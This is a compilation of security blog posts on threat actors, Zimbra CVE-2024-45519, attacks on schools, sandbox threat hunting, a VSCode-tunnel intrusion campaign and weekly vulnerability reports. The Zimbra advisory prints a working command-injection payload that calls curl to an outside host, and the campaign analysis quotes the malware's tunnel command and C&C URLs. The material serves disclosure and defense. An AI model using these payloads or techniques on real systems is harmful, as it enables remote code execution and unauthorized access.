ESET Research details the tools and activities of a new China-aligned threat actor, CeranaKeeper, focusing on massive data exfiltration in Southeast Asia
WeLiveSecurity – Read More
A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.
A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.
The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.
Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.
Patched versions include these versions and newer:
9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46
One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.
Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.
The researchers reversed the postjournal binary and found that there were no calls to execvp or the run_command function. Instead, a direct call to popen was made in the read_maps function, allowing input to be passed without sanitization. The cmd argument passed to popen in double quotes would prevent command injection with simple shell metacharacters, but that control could be bypassed with $() syntax.
The postjournal service was then exploited via port 10027 with the following SMTP commands:
EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>
DATA
Test message
.
The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:
zmlocalconfig -e postjournal_enabled=true
zmcontrol restart
To enable remote exploit, the researchers found that the mynetworks default configuration included a /20 CIDR range of their public IP address, which could allow the exploit to be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.
Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.
Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if connected, the base64 blobs decode to a command to write a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).
Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.
Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:
cveID
vendorProject
product
vulnerabilityName
CVE-2023-37580
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-27926
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-41352
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-27925
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-37042
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability
CVE-2022-27924
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Command Injection Vulnerability
CVE-2018-6882
Zimbra
Collaboration Suite (ZCS)
Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-24682
Zimbra
Webmail
Zimbra Webmail Cross-Site Scripting Vulnerability
While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.
All Zimbra administrators should:
Disable postjournal if not needed
Configure mynetworks to prevent unauthorized access
Apply the latest security updates directly from Zimbra
The post Zimbra Remote Code Execution Vulnerability Under Active Attack appeared first on Cyble.
Blog – Cyble – Read More
A very troubling trend in recent years has been the rising number of cyberattacks targeting educational institutions. The United States, for instance, has seen school education become one of the most targeted sectors. According to the UK’s Information Commissioner’s Office (ICO), the number of attacks on schools increased by 55% from 2022 to 2023. A similar pattern is emerging globally. Let’s unpick what’s going on here, and look at the ways schools can defend themselves.
Several factors contribute to the growing vulnerability of schools, making them attractive targets for cybercriminals:
Dependence on technology. Educational institutions are rapidly becoming digital and are thus reliant on IT infrastructure both in the classroom and in schools’ administration offices. However, their cybersecurity practices are often sadly lacking.
Valuable data. Schools store a wealth of sensitive information, including student and staff data, and financial records. Data breaches can have devastating consequences, and this data is exactly what attackers are after.
Scarce resources. Schools often face tight budgets and a shortage of qualified IT professionals — especially in cybersecurity.
Low user awareness. A great many computer users in schools have little cybersecurity nous. This means they’re susceptible to phishing attacks, malware infections, and other cyberthreats. Often, teachers aren’t much more cyber-savvy.
This all turns educational institutions into sitting ducks. What’s more, successful attacks attract plenty of public attention, which gives cybercriminals leverage — particularly in ransom negotiations following a ransomware attack. The essential nature and social importance of educational institutions also play a significant role.
Sure, if a ransomware attack temporarily shuts a retail chain down, it’s unpleasant — but mostly just for the business itself; customers can generally go elsewhere quite easily. However, if a cyberattack disrupts a school, the consequences are far more serious. Students lose access to education, their academic performance suffers, and parents get landed with arranging childcare and other headaches.
Attacks on education are now so common that you don’t have to look far for examples of even large-scale incidents — just look at recent headlines. Not so long ago, a cyberattack targeted Highline Public Schools, a school district in Washington state in the US. The incident forced the district to temporarily close all 34 of its schools — affecting over 17,000 students. All educational activities, including athletics and meetings, were suspended.
In August of this year, the Singapore Ministry of Education announced that an unknown hacker had wiped clean 13,000 iPads and Chromebooks used by students across the country.
In June, the Toronto District School Board, which oversees nearly 600 schools in Canada’s largest city, was hit by a ransomware attack. In May, Western Sydney University, one of Australia’s largest universities with over 35,000 students, reported a hack on its IT infrastructure.
With the education sector firmly in the crosshairs of cybercriminals, schools’ IT systems need robust protection.
So how to get it? While large schools, colleges, and universities can allocate substantial budgets for enterprise-grade software and dedicated cybersecurity staff, smaller schools often lack these resources.
As a result, these schools sometimes resort to using security software intended for home use. However, this isn’t ideal. Such products aren’t designed for centralized management, so deploying them across numerous school computers, let alone managing them effectively, can become a major headache.
A far better solution for small schools would be a product designed for small and medium businesses (SMB), such as Kaspersky Small Office Security. Such security software offers all the essential features needed for basic security:
Reliable protection against ransomware and other malware
Automatic backups
Password manager to protect accounts
Vulnerability scanning and much more
Furthermore, SMB security solutions is easy to deploy, and it can operate on an “install and forget” basis — no dedicated IT or security specialist is required for setup and management.
To strengthen school cybersecurity further, we also recommend conducting staff training to raise awareness of cyberthreats. This is easy to set up with our Kaspersky Automated Security Awareness Platform, which helps slash both the time and cost of training.
Kaspersky official blog – Read More
Editor’s note: The current article is authored by Anna Pham (also known as RussianPanda), a threat intelligence researcher. You can find her latest research and insights on X, LinkedIn, and her blog.
ANY.RUN introduced Threat Intelligence Lookup in February 2024, followed by the YARA Search in April 2024. This article will explore both services and their use cases.
Threat Intelligence Lookup allows users to search through the database of sandbox tasks by examining specific details such as:
Processes
Modules
Files
Network and registry activity
All of these are logged by the ANY.RUN sandbox.
The service helps users find critical information like IOCs (Indicators of compromise), events, sandbox reports, and other data corresponding to the search query.
The main page of the Threat Intelligence service provides a summary of the most common MITRE techniques used, malware threat statistics, and popular Suricata rules derived from submitted samples, offering valuable insight into current cyber threat trends.
After navigating to the Lookup section you’ll be able to submit your search query using over 40 different search parameters.
Explore all search parameters available in TI Lookup in the following article. ANY.RUN also offers a comprehensive query guide for the TI Lookup once you’re on the platform.
Let’s now look into a few use cases with some of TI Lookup’s key search parameters.
We can create a query to identify stealers reaching out to Telegram IPs, potentially exfiltrating sensitive data, using the “destinationIpAsn” and “threatName” parameters, as shown below, for the past three months or 180 days. You can also search within 60, 30, 14, 7, 3, or 1-day intervals and bookmark the search query for later use.
Here is the query:
The search results show the associated IPs, Events, Files, Tasks, Synchronization (events and mutexes created), and Network threats.
From the Files tab, users can extract indicators and save them in JSON format.
Note: You can export data from any category, such as IPs, Events, Tasks, etc., in JSON. Additionally, users can view binary characteristics with static analysis or download the binary itself.
We can confirm the exfiltration activity via Telegram within the Network threats tab.
To identify LummaC2 samples and C2 domains, we can use Lumma’s domains that are known to end with “.shop/api” via the following query:
The dollar sign ($) in a search represents the end of a string. When used in a search pattern, it ensures that the search string must match the end of the text being evaluated. So, using $ in the pattern “.shop/api$” ensures that the URL ends exactly with .shop/api and no other characters follow.
From the search results, we identified 26 URLs and domains related to LummaC2, which can be exported and operationalized for further monitoring, blocking, or threat hunting within the security infrastructure.
We know that some stealers, such as Vidar Stealer, RecordBreaker (Raccoon Stealer v2), and StealC, use additional DLL dependencies like “softokn3.dll” and “mozglue.dll” to facilitate data exfiltration from browsers, so we can create a query to look for URLs delivering the DLLs:
From the results below, we can see the processes that initiated the connections to the URLs to retrieve the DLLs, along with the associated URLs, IP addresses, and the countries of origin for those IPs.
Additionally, we identified another pivot point with the ASN “1337team Limited”:
Pivoting on the ASN mentioned above revealed more events and IPs, some of which are associated with StealC, Redline, and Amadey activities.
Users can search for relevant samples using MITRE techniques or IDs. ANY.RUN provides predefined IDs and their definitions, eliminating the need to search for them elsewhere.
We can look for phishing samples containing malicious QR codes via the following query, where T1566 is Phishing:
Now, we can spice up the query and look for phishing links containing the Cloudflare challenge that is commonly used by Tycoon 2FA and other phishing kits:
The query can also be adjusted to show the phishing samples with URL submissions only instead of the file attachments using the threatLevel “malicious” to avoid false positives:
We can search for Latrodectus downloader samples, which is known to drop the copy of itself under the “%AppData%Custom_update” path. We can leverage that knowledge to create a query that looks for command lines containing that path:
From the Synchronization tab, we notice the mutex “runnung” being used, so we can also leverage that to look for Latrodectus samples.
We can also leverage CommandLine to look for malicious PowerShell commands, for example, while looking for a RobotDropper, aka LegionLoader samples.
So, for the query, we are going to grab a snippet of the base64-encoded command, which partially decodes to “$w=new-object”:
We have 13 samples that match our query, all of which are true positives.
We can also create a query that searches for Gh0stRAT samples and C2s using “destinationIPgeo” as one of the search parameters; this query looks for Gh0stRAT samples that connect to servers located in China:
In addition to the Threat Intelligence Lookup service, ANY.RUN offers YARA Search, enabling users to scan its database of collected and analyzed threat data using YARA rules, whether imported from the local machine or created on the fly.
We can create a YARA rule to look for LummaC2 Stealer samples, and in under 10 seconds, we get the results, which is impressively fast. Users can also run multiple YARA scans in separate tabs.
You can view the binary’s PE characteristics from the results, download it, and export the results in JSON format.
ANY.RUN’s Threat Intelligence Lookup and YARA Search services allow for precise threat hunting and the extraction of valuable insights into current cyber threat trends. What’s impressive is how fast these scans are—they significantly speed up the analysis process, allowing for quick detection of threats and malware.
ANY.RUN is making it easier for organizations to take a proactive and informed stance on cybersecurity, which is essential in our constantly evolving threat landscape.
Test ANY.RUN’s Threat Intelligence Lookup and YARA Search in a free trial →
The post TI Lookup: Real-World Use Cases <br>from a Malware Researcher appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
Building efficient recovery options will drive ecosystem resilience
WeLiveSecurity – Read More
Cyble Research and Intelligence Labs (CRIL) uncovered a sophisticated attack that leverages legitimate tools such as Visual Studio (VS) Code and GitHub.
The Threat Actor (TA) used a.LNK file as the initial attack vector, potentially delivered through spam or phishing emails. The .LNK file is disguised as a legitimate setup file, using an MSI setup icon to deceive users into executing it.
Upon execution, the .LNK file silently downloads a Python distribution package and uses it to run a malicious Python script.
The TA leverages a VScode tool to initiate a Remote Tunnel and retrieve an activation code, which the TA can use to gain unauthorized remote access to the victim’s machine. This enables the TA to interact with the system, access files, and perform additional malicious activities.
To maintain persistence, the TA creates a scheduled task designed to automatically trigger the execution of a malicious Python script with SYSTEM privileges and high priority.
Similar tactics, techniques, and procedures (TTP) were employed by the Chinese APT group, Stately Taurus, in cyber espionage campaigns aimed at organizations throughout Europe and Asia.
Cyble Research and Intelligence Lab (CRIL) uncovered a campaign that leverages a suspicious .LNK file as the initial attack vector. This file, potentially delivered via spam emails, downloads a Python distribution package that is then used to execute an obfuscated Python script retrieved from a paste site. At the time of publishing this research, this script had no detections on VirusTotal (VT), making it difficult to identify through standard security measures.
Once executed, the Python script establishes persistence by creating a scheduled task with system privileges and high priority. It checks if Visual Studio Code (VSCode) is installed on the victim’s machine. If not, the script downloads the standalone VSCode CLI from a trusted source. Using VSCode, the script creates a remote tunnel, sharing an activation code with the TA, which facilitates unauthorized remote access to the victim’s machine.
The VSCode Remote – Tunnels extension is typically used to connect to a remote machine, such as a desktop PC or virtual machine (VM), via a secure tunnel. This enables users to access the machine from any VSCode client without the need for SSH. However, in this campaign, the TA exploits this feature, using it to establish a remote connection to the victim’s system for malicious purposes.
This attack method mirrors tactics previously observed in campaigns by the Stately Taurus Chinese APT group, as documented by Unit42 researchers. In this blog, we will examine how the TA cleverly uses legitimate tools like VSCode and GitHub to conceal their activity and establish unauthorized remote connections. The figure below illustrates the infection chain.
CRIL has identified a campaign involving a suspicious .LNK file masquerading as an installer. When executed, it displays a fake “Successful installation” message in Chinese (“安裝成功“). However, in the background, it silently downloads additional components using the curl utility, including a Python distribution package named “python-3.12.5-embed-amd64.zip”.
The .LNK file then creates a directory at “%LOCALAPPDATA%MicrosoftPython” and extracts the contents of the zip archive using tar.exe into this location. Afterward, it downloads a malicious script from a paste.ee site via the URL “hxxps[:]//paste[.]ee/r/DQjrd/0” and saves it as “update.py” in the same location. Once the download is complete, the “update.py” is executed using “pythonw.exe” without showing a console window. The contents of the LNK file are shown below:
The script begins by checking whether Visual Studio Code (VSCode) is already installed on the system. It does this by verifying the existence of the directory located at “%LOCALAPPDATA%microsoftVScode.” If this directory is not found, indicating that VSCode is not installed, the script then proceeds to download the VSCode Command Line Interface (CLI) from a Microsoft source: “hxxps://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli[.]zip.” Once downloaded, the zip file is extracted, and the executable file “code.exe” is placed into the “%LOCALAPPDATA%microsoftVScode” directory
The script then proceeds to create a scheduled task named “MicrosoftHealthcareMonitorNode” to ensure the persistence of its malicious activities. It is designed to execute the “update.py” script using “pythonw.exe,” which runs without showing a console window, allowing the malicious activity to stay hidden. Before creating the task scheduler entry, the script checks if it already exists by running the command “schtasks /query /tn MicrosoftHealthcareMonitorNode” to avoid creating duplicates.
The configuration of this task varies depending on the user’s privilege level. For non-admin users, the task is set to run every four hours, beginning at 8:00 AM, ensuring that the malicious script is executed at regular intervals. On systems where the user has administrative privileges, the task is configured to trigger at logon, running with elevated SYSTEM privileges and high priority, which grants it more control and less likelihood of being interrupted. The figure below shows the Schedule task entry created by the malware.
The script next checks if “code.exe” is already running in the background by inspecting the output of the “tasklist” command. If it detects that “code.exe” is not active, then proceeds to execute “code.exe” to log out any active remote sessions. This is done by issuing the command “code.exe tunnel user logout,” which ensures the termination of any existing remote tunnels connected to the victim’s system. This step is crucial for the TA, as it allows them to establish a fresh remote tunnel for future interactions with the victim’s system.
After ensuring the existing tunnel is closed, the script initiates a new process using the command:
code.exe –locale en-US tunnel –accept-server-license-terms –name <COMPUTERNAME>
This command initiates a remote tunnel, and the script automatically associates it with a GitHub account for authentication. Now, the output of the “code.exe” command is saved in a file named “output.txt” within the “%localappdata%microsoftVSCode” directory. Additionally, the content of “output.txt” is copied to another file named “output2.txt” in the same directory to extract the 8-character alphanumeric activation code for the GitHub account.
Following this, the script reads the “output2.txt” file and identifies the GitHub account activation code using a regular expression pattern “and use code (w{4}-w{4})” as shown in the figure below. This extracted code is saved to a variable for later stages of the attack, enabling further malicious activities.
The TA then gathers the victim’s system information by collecting the names of folders from several directories, including “C:\Program Files,” “C:\Program Files (x86),” “C:\ProgramData,” and “C:\Users.” In addition, Additionally, the TA obtains a list of processes currently running on the victim’s machine and sends this information directly to the TA’s command-and-control (C&C) server, “hxxp://requestrepo.com/r/2yxp98b3“ as shown below. RequestRepo.com is primarily a tool for analyzing incoming HTTP and DNS requests. However, the TA has exploited it to capture stolen data transmitted from victim machines.
Furthermore, the TA gathers more sensitive data, such as the system’s language settings, geographical location, computername, username, userdomain, the activation code for the remote tunnel, and details about user privileges. All of this data is base64 encoded to obfuscate it before being sent to the command-and-control (C&C) server via a POST request. The figure below shows the code snippet used by the TA for data exfiltration.
After the TA receives the exfiltrated data, they can log in using their GitHub account at the URL “hxxps://github.com/login/device”. Here, the TA can enter the exfiltrated alphanumeric activation code to gain unauthorized access to the victim’s machine.
Unauthorized access to the victim’s machine allows the TA to view and manipulate files and directories stored on the victim’s system. The figure below shows how the TA can access the victim’s files through the VSCode tunnel using the stolen activation code.
This degree of access not only enables them to browse through the victims’ files but also enables them to execute commands through the terminal. With this control, the TA can perform a variety of actions, such as installing malware, extracting sensitive information, or altering system settings, potentially leading to further exploitation of the victim’s system and data.
Unit42 researchers explained that the TA can execute several tools, including mimikatz, LaZagne, In-Swor, and Tscan, to perform various malicious activities on the victim’s system.
This campaign demonstrates the growing sophistication of TAs in leveraging legitimate tools like VSCode to establish unauthorized access to victim systems. By utilizing a seemingly harmless .LNK file and an obfuscated Python script, the Threat Actot can effectively bypass detection measures. This access allows them to manipulate files, execute commands, and potentially install additional malware, amplifying the scope for exploitation.
Organizations maintain a proactive security posture, focusing on vigilance, enhancing existing security practices, and implementing new ones to defend against a constantly evolving threat spectrum. Understanding these tactics is crucial for building a more resilient cybersecurity posture.
Utilize advanced endpoint protection solutions that include behavioral analysis and machine learning capabilities to detect and block suspicious activities, even those involving legitimate applications like VSCode.
Review scheduled tasks on all systems regularly to identify unauthorized or unusual entries. This can help detect persistence mechanisms established by threat actors.
Conduct training sessions to educate users about the risks of opening suspicious files or links, particularly those related to .LNK files and unknown sources.
Limit user permissions to install software, particularly for tools that can be exploited, like VSCode. Implement application whitelisting to control which applications can be installed and run on systems.
Deploy advanced monitoring tools that can detect unusual network traffic, unauthorized access attempts, and abnormal behavior within the system. Regularly audit and review system and application logs to catch early signs of intrusion.
Tactic
Technique
Procedure
Execution (TA0002)
Command and Scripting Interpreter: Python (T1059.006)
Update.py is downloaded and executed by the shortcut file
Persistence (TA0003)
Scheduled Task/Job: Scheduled Task (T1053.005)
“MicrosoftHealthcareMonitorNode” scheduled task is created for non-admin users
Privilege Escalation (TA0004)
Scheduled Task/Job: Scheduled Task (T1053.005)
“MicrosoftHealthcareMonitorNode” scheduled task is created for admin users with SYSTEM privilege
Defense Evasion (TA0005)
Masquerading: Match Legitimate Name or Location (T1036.005)
Creates a folder “%localappdata%/Microsoft/Python” directory
Discovery (TA0007)
System Information Discovery (T1082)
Collects system’s language settings, geographical location, computername, username, and userdomain
Discovery (TA0007)
File and Directory Discovery (T1420)
Collects folder names present in program files and program data directory
Discovery (TA0007)
Process Discovery (T1057)
“tasklist” command is used to gather a list of currently running processes.
Command and Control (TA0011)
Application Layer Protocol: Web Protocols (T1071.001)
The VSCode tunnel feature is used to access the victim’s system.
Indicators
Indicator Type
Description
281766109f2375a01bad80478fd18841eccaefc1ee9277179cc7ff075d1beae2
SHA-256
Shortcut file
c7f07bdfb91653f53782885a3685436e2e965e1c5f4863c03f5a9825c0364489
SHA-256
update.py
hxxp://requestrepo.com/r/2yxp98b3
C&C
POST request sent to this URL
hxxps://paste[.]ee/r/DQjrd/0
URL
Downloads update.py
The post Silent Intrusion: Unraveling the Sophisticated Attack Leveraging VS Code for Unauthorized Access appeared first on Cyble.
Blog – Cyble – Read More
Gathering Indicators of Compromise (IOCs) is key to identifying and responding to threats. IOCs are pieces of forensic data that point to potential malicious activity, helping you detect, investigate, and prevent cyberattacks.
With ANY.RUN, you can collect a wide variety of IOCs, giving you a complete picture of any threat.
Let’s dive into the types of IOCs you can collect in ANY.RUN’s Interactive Sandbox and where to find them.
The Main Object is one of the most critical components when analyzing malware inside the ANY.RUN sandbox. This refers to the primary file that was loaded for analysis.
Once you’ve initiated a sandbox analysis session, simply click on the file name located in the upper-right corner of the screen.
This action will give you quick access to the Main Object IOCs, which include basic details such as file paths, hashes, and more.
All files dropped during the malware’s execution are shown in the bottom panel under Files. This area demonstrates exactly what files the malware generated or modified, helping you track its propagation across the system.
Domains that the malware attempts to access can help you trace its communication with external servers, such as command-and-control (C2) infrastructure.
You can find these IOCs under Network → DNS Requests in the bottom panel of the sandbox interface.
By analyzing the DNS requests, you’ll get a clearer view of how the malware interacts with remote hosts, often revealing malicious infrastructure or other indicators that can assist in further threat investigation.
The malware’s active connections can be observed under Network → Connections.
This feature allows you to monitor the malware’s communication channels, tracking its interactions with command-and-control (C2) servers or other suspicious IP addresses.
Analyzing these connections enables you to identify data exfiltration routes or pinpoint where the malware is sending information.
HTTP and HTTPS requests initiated by the malware are logged under Network → HTTP Requests. This is crucial for identifying malicious websites or external servers the malware connects to.
In the ANY.RUN sandbox, you can gather IOCs specifically associated with malware configurations by clicking the MalConf button located in the upper right corner of the screen.
The feature specifically pulls IOCs from to the malware’s configurations, such as URLs, file hashes, and domains, providing key insights that are crucial for further in-depth investigation and reporting.
You can easily access all the important indicators in the IOC window.
Simply hit the IOC button located in the top-right corner, and you’ll instantly gain access to the most critical IOCs collected throughout the analysis—whether they come from Static Analysis or Malware Configurations.
This window saves time and ensures that all critical data is conveniently organized in one place for easier review.
The IOC window is easy to navigate thanks to the simple dropdown menu.
You can quickly filter and organize IOCs. Plus, copying the selected indicators for your reports or further analysis is just a click away, making the whole process smooth and efficient.
ANY.RUN helps more than 400,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, Yara Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
With ANY.RUN you can:
Detect malware in seconds
Interact with samples in real time
Save time and money on sandbox setup and maintenance
Record and study all aspects of malware behavior
Collaborate with your team
Scale as you need
The post How to Collect Indicators of Compromise <br>in the ANY.RUN Sandbox appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
Cyble threat intelligence researchers investigated 15 vulnerabilities this week and highlighted three of them for security teams to prioritize.
Cyble researchers also found seven vulnerability exploits discussed on the dark web and cybercrime forums, raising the risk that those flaws will be increasingly exploited.
Cyble recommends eight best practices for preventing and limiting cyberattacks and data breaches.
Cyble Research and Intelligence Labs (CRIL) researchers this week investigated 15 vulnerabilities of particular significance for IT teams, and identified three that merit high-priority patching.
Cyble’s Sept. 18-24 Weekly Vulnerability Insights Report for subscribers also examined seven exploits circulating on the dark web and cybercrime forums, elevating the importance of addressing those flaws too.
Cyble also highlighted eight cybersecurity best practices that all organizations should follow to reduce the risk of cyberattacks and contain any that do occur.
The full report is available for subscribers; here we’ll focus on the most critical risks.
The three vulnerabilities highlighted in the report include:
CVE-2024-8963, a critical admin bypass vulnerability in Ivanti Cloud Services Appliance (CSA), is a security-focused solution designed to facilitate secure communication and device management. Recently, Ivanti disclosed that attackers could exploit the flaw by chaining CVE-2024-8963 with CVE-2024-8190 to bypass admin authentication and execute arbitrary commands on unpatched appliances. This vulnerability is also being discussed on the dark web (see below). There is an available patch. Cyble researchers also issued a separate advisory on a vulnerability (CVE-2024-7593) in Ivanti’s Virtual Traffic Manager (VTM).
CVE-2024-45409, a critical SAML authentication bypass vulnerability impacting self-managed installations of the GitLab Community Edition (CE) and Enterprise Edition (EE). Security Assertion Markup Language (SAML) is a single sign-on (SSO) authentication protocol that allows users to log in across different services using the same credentials. An unauthenticated attacker with access to any signed SAML document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as an arbitrary user within the vulnerable system. The disclosure follows several other recent GitLab vulnerabilities.
Internet Exposure? No
Patch Available? Yes
CVE-2024-7490, a critical improper input validation vulnerability in Microchip Technology Advanced Software Framework, a comprehensive library designed for microcontrollers, facilitating various stages of product development, including evaluation, prototyping, design, and production. The vulnerability can cause remote code execution through a buffer overflow. This vulnerability is associated with program files tinydhcpserver.C and program routines lwip_dhcp_find_option.
Internet Exposure? No
Patch Available? Yes
CRIL researchers observed multiple Telegram channels where the channel administrator shared or discussed exploits weaponizing vulnerabilities, including:
CVE-2024-8190: This is a high-severity OS command injection vulnerability present in Ivanti’s Cloud Services Appliance versions 4.6 Patch 518. It allows attackers with admin access to execute arbitrary commands on the system, potentially leading to complete system compromise.
CVE-2024-36837: A high-severity SQL injection vulnerability present in CRMEB version 5.2.2. This vulnerability allows remote attackers to gain unauthorized access to sensitive information.
CVE-2024-46740: A high severity Use-After-Free (UAF) vulnerability in the Linux Kernel. It is specifically related to the binder subsystem.
CVE-2024-20439: A critical security vulnerability affecting the Cisco Smart Licensing Utility, which could allow unauthenticated, remote attackers to gain administrative access to the system.
CVE-2024-8956: A critical improper authentication vulnerability was identified in PTZOptics’ PT30X-SDI and PT30X-NDI cameras prior to firmware version 6.3.40.
CVE-1999-1587: A vulnerability is present in the ‘/usr/ucb/ps’ command in Sun Microsystems’ Solaris OS, affecting Solaris 8 and 9, as well as a few older versions. The vulnerability allows local users to exploit certain parameters in the commands to view environment details on the system.
CVE-2024-23692: CRIL observed multiple administrators of Telegram channels and a Threat Actor sharing a proof of concept (PoC) for a critical command injection vulnerability affecting the Rejetto HTTP File Server (HFS), specifically versions up to 2.3m. The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands by sending specially crafted HTTP requests to the server.
To protect against these vulnerabilities and exploits, organizations should implement the following best practices:
To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
Maintain an up-to-date inventory of all internal and external assets, including hardware, software, and network components. Use asset management tools and continuous monitoring to ensure comprehensive visibility and control over your IT environment.
Change default passwords immediately and enforce a strong password policy across the organization. Implement multi-factor authentication (MFA) to provide an extra layer of security and significantly reduce the risk of unauthorized access.
The post Weekly IT Vulnerability Report: Cyble Urges Fixes for Ivanti, GitLab and Microchip appeared first on Cyble.
Blog – Cyble – Read More
Cyble’s Threat Hunting Honeypot sensors detected five recent vulnerabilities under active exploitation, including newly identified attacks against WordPress plugins.
A new banking trojan is engaged in active attacks in Europe and is expected to spread to other regions.
Of more than 400 identified scam email addresses discovered, six in particular stand out.
Commonly targeted ports have been identified and should be blocked by security teams.
Cyble’s Threat Hunting service this week discovered multiple instances of exploit attempts, malware intrusions, financial fraud, and brute-force attacks via its network of Honeypot sensors.
In the week of Sept. 18-24, Cyble researchers identified five recent active exploits, including new attacks against WordPress plugins, a new malware variant targeting the banking industry, more than 400 new spam email addresses, and thousands of brute-force attacks.
Cyble sensors detected five recent vulnerabilities under active exploitation, in addition to a number of older vulnerabilities being actively exploited:
Case 1: SQL Injection Attack
CVE-2024-27956 is a 9.9-severity improper neutralization of Special Elements used in an SQL Command vulnerability in ValvePress Automatic WordPress plugins that allows for SQL Injection attacks. This issue affects Automatic: from n/a through 3.92.0.
Case 2: PHP CGI Argument Injection Vulnerability
CVE-2024-4577 is a 9.8-severity PHP vulnerability that impacts CGI configurations and has been under attack since it was announced in June. It enables attackers to execute arbitrary commands through specially crafted URL parameters. It affects PHP versions 8.1.* before 8.1.29; 8.2.* before 8.2.20; and 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows.
Case 3: GeoServer Vulnerability Allows Remote Code Execution via Unsafe XPath Evaluation
CVE-2024-36401 is a 9.8-severity RCE vulnerability in GeoServer versions prior to 2.23.6, 2.24.4, and 2.25.2. The flaw arises from the unsafe evaluation of OGC request parameters as XPath expressions, allowing unauthenticated users to execute arbitrary code on default installations. The issue affects all GeoServer instances due to improper handling of simple feature types. Patches are available, and a workaround involves removing the vulnerable gt-complex library, which may impact functionality.
Case 4: Network Command Injection Vulnerability Without Authentication
CVE-2024-7029 is an 8.7-severity AVTECH IP camera vulnerability that allows remote attackers to inject and execute commands over the network without requiring authentication. This critical flaw poses a significant risk, enabling unauthorized control over affected systems.
Case 5: Network Command Injection Vulnerability Without Authentication
The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to a 9.8-severity arbitrary code execution vulnerability (CVE-2024-7954). A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
Octo2, a new variant of the Octo mobile banking trojan, was recently discovered in European bank attacks, and deployment in other global regions is expected to follow.
Octo (also known as ExobotCompact) has emerged as one of the most prominent malware families in the mobile threat landscape, leading in the number of unique samples detected this year. Recently, a new variant named “Octo2,” created by the original threat actor, has been discovered, signaling a potential shift in the actors’ tactics and strategies. This upgraded version enhances the malware’s remote action capabilities, particularly for Device Takeover attacks, ensuring greater stability in execution. New Octo2 campaigns have already been observed targeting several European countries. Additionally, Octo2 employs advanced obfuscation techniques to evade detection, including the introduction of a Domain Generation Algorithm (DGA), further bolstering its ability to remain hidden from security systems.
Here are known hashes and IoCs, via Threat Fabric:
Hash (SHA256)
app name
package name
83eea636c3f04ff1b46963680eb4bac7177e77bbc40b0d3426f5cf66a0c647ae
NordVPN
com.handedfastee5
6cd0fbfb088a95b239e42d139e27354abeb08c6788b6083962943522a870cb98
Europe Enterprise
com.xsusb_restore3
117aa133d19ea84a4de87128f16384ae0477f3ee9dd3e43037e102d7039c79d9
Google Chrome
com.havirtual06numberresources
